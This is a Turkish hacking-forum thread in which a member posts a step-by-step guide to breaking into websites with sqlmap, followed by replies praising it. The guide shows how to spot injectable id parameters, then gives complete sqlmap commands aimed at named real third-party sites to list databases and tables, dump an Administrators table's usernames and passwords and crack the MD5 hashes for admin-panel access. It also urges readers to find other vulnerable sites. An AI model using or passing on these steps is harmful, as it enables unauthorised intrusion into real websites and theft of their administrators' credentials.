İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7

Veteran 7 - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
12/2012
Mesajlar:
11.476
Konular:
2285
Teşekkür (Etti):
2182
Teşekkür (Aldı):
11613
Ticaret:
(0) %
18-10-2017 22:59
#1
SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7
Gerekli Dosyalar & Kurulum





+ Python 2.7 adlı setup ile Python kuruyoruz +
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +
+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +
+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +

Gerekli Dosyaları İndirmek İçin Tıklayınız

Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden indirebilirler ;

sqlmap: automatic SQL injection and database takeover tool
https://www.python.org/download/releases/2.7/



Adım 1 : SQLMAP'ı CMD İle Çalıştırma

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:
cd..


Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap


Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.



Adım 2 : SQL Açıklı Site Bulmak

+ Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "page.php?id=18" gibi.

+ Örnek Site : Welcome to the DockGuard website
+ Yukarıda verdiğim siteye girip sondaki ıd değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi ;

Kod:
http://www.dockguard.co.uk/page.php?id=18'
Şu hatayı alacaksınız ;

Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1
Bu ve benzeri hata metinleri sitede sql açığı olduğuna dair en basit belirtilerdir.



Adım 3 : SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)

Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme (Database)

SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefsite.com...aciklibolum?id=--dbs
Yani biz açıklı olarak bulduğumuz herhangi bir siteyi çekmek için şu şekilde yazacağız ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193--dbs
Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER tuşuna basalım



ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz

Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi





Adım 3.2 - Veritabanı Tablolarını Çekmek

SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız ;

[IMG]sqlmap.py -u http://hedefurl.comVeritabanı_Adı --tables[/IMG]

Yani biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193seaofstories_app --tables
Not : "information_schema" adlı veritabanı ile işimiz yok bizim işimiz "seaofstories_app" adlı veritabanı ile. Aşağıdaki gibi kodumuzu yazı enter'a bastığımızda bize tablo isimlerini verecektir



İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.



Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek

SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns
Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators --columns
Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.



Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme

SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C password --dump
Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.

Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız ;

Kod:
 sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C username --dump


Yardımcı Olabilecek Yazılımlar

Veteran Dork Studio 3 FINAL - Dork Yardımcı Programı
Veteran SQLMAP Helper - SQLMAP Kod Yardımcı Programı



V E T E R A N 7

Not : Konu bana aittir geçmişte açılan bir konuydu silinmişti,tekrardan derleyip konuyu açtım ilk görsellerde kırmızı çizili alanlarda bilgisayarın kullanıcı adı olarak ismim soyismim göründüğünden ötürü sansür uygulanmıştır.


Konu M4K4R tarafından (10-03-2018 21:50 Saat 21:50 ) değiştirilmiştir.
garry0n - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2015
Nereden:
Nereye...
Yaş:
27
Mesajlar:
1.807
Konular:
100
Teşekkür (Etti):
200
Teşekkür (Aldı):
191
Ticaret:
(0) %
18-10-2017 23:02
#2
Eline sağlık abim
Senin böyle bir konun vardı sanki
--------------------- Açığı olmayan tek sistem evrendir

1 Site Hacked -- 8 Site Dump

Emekli THT Yarbayı
Veteran 7 - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
12/2012
Mesajlar:
11.476
Konular:
2285
Teşekkür (Etti):
2182
Teşekkür (Aldı):
11613
Ticaret:
(0) %
18-10-2017 23:03
#3
Alıntı:
garry0n´isimli üyeden Alıntı Mesajı göster
Eline sağlık abim
Senin böyle bir konun vardı sanki
Evet kardeşim lakin bazı bilinmeyen sebeplerden ötürü silindi konu bende tekrar açtım sizlere faydası olması açısından
Flerntinao, EndLoss12 Teşekkür etti.
Flerntinao - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2014
Nereden:
İstanbul
Mesajlar:
155
Konular:
14
Teşekkür (Etti):
76
Teşekkür (Aldı):
13
Ticaret:
(0) %
18-10-2017 23:05
#4
Ellerine sağlık başkan tekrar açılması iyi olmuş konunun.
Bade Perest - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2017
Yaş:
99
Mesajlar:
1.696
Konular:
137
Teşekkür (Etti):
365
Teşekkür (Aldı):
251
Ticaret:
(0) %
18-10-2017 23:07
#5
Emegine saglik guzel konu olmus ustad.
KemalAli77 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2015
Nereden:
'⭐'&#
Mesajlar:
1.216
Konular:
61
Teşekkür (Etti):
465
Teşekkür (Aldı):
317
Ticaret:
(0) %
18-10-2017 23:08
#6
kardeş manuel olarak yapmamızımı önerirsin yoksa sqlmap kullanmamızmı bence yeniler manuel olarak öğrenmeli
Veteran 7 - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
12/2012
Mesajlar:
11.476
Konular:
2285
Teşekkür (Etti):
2182
Teşekkür (Aldı):
11613
Ticaret:
(0) %
19-10-2017 16:35
#7
Arkadaşlar örnek olarak kullandığım websitesinin açığı kapanmış olabilir başka bir sql açıklı site üstünden yürümenizi öneriyorum aynı adımlar ve aynı kodlar ile değişen birşey yok,iyi çalışmalar.
JustArma - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2017
Nereden:
J:\JustArma
Mesajlar:
695
Konular:
58
Teşekkür (Etti):
27
Teşekkür (Aldı):
177
Ticaret:
(0) %
19-10-2017 16:50
#8
Efsane Geri Döndü Eline Emeğine Sağlık Hocam
sivanci40 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Nereden:
TURKEY
Yaş:
19
Mesajlar:
1.129
Konular:
93
Teşekkür (Etti):
326
Teşekkür (Aldı):
127
Ticaret:
(0) %
19-10-2017 16:57
#9
Mükemmel hocam
---------------------
SOSYAL MÜHENDİSLİK
WEB HACKİNG
DarkGuardian82 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
Database
Mesajlar:
2.133
Konular:
50
Teşekkür (Etti):
38
Teşekkür (Aldı):
211
Ticaret:
(0) %
19-10-2017 16:58
#10
Eline sağlık
--------------------- Eğer Hayvanların Bir Dini Olsaydı Kesinlikle Dinlerindeki Şeytan İnsan Olurdu ..

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı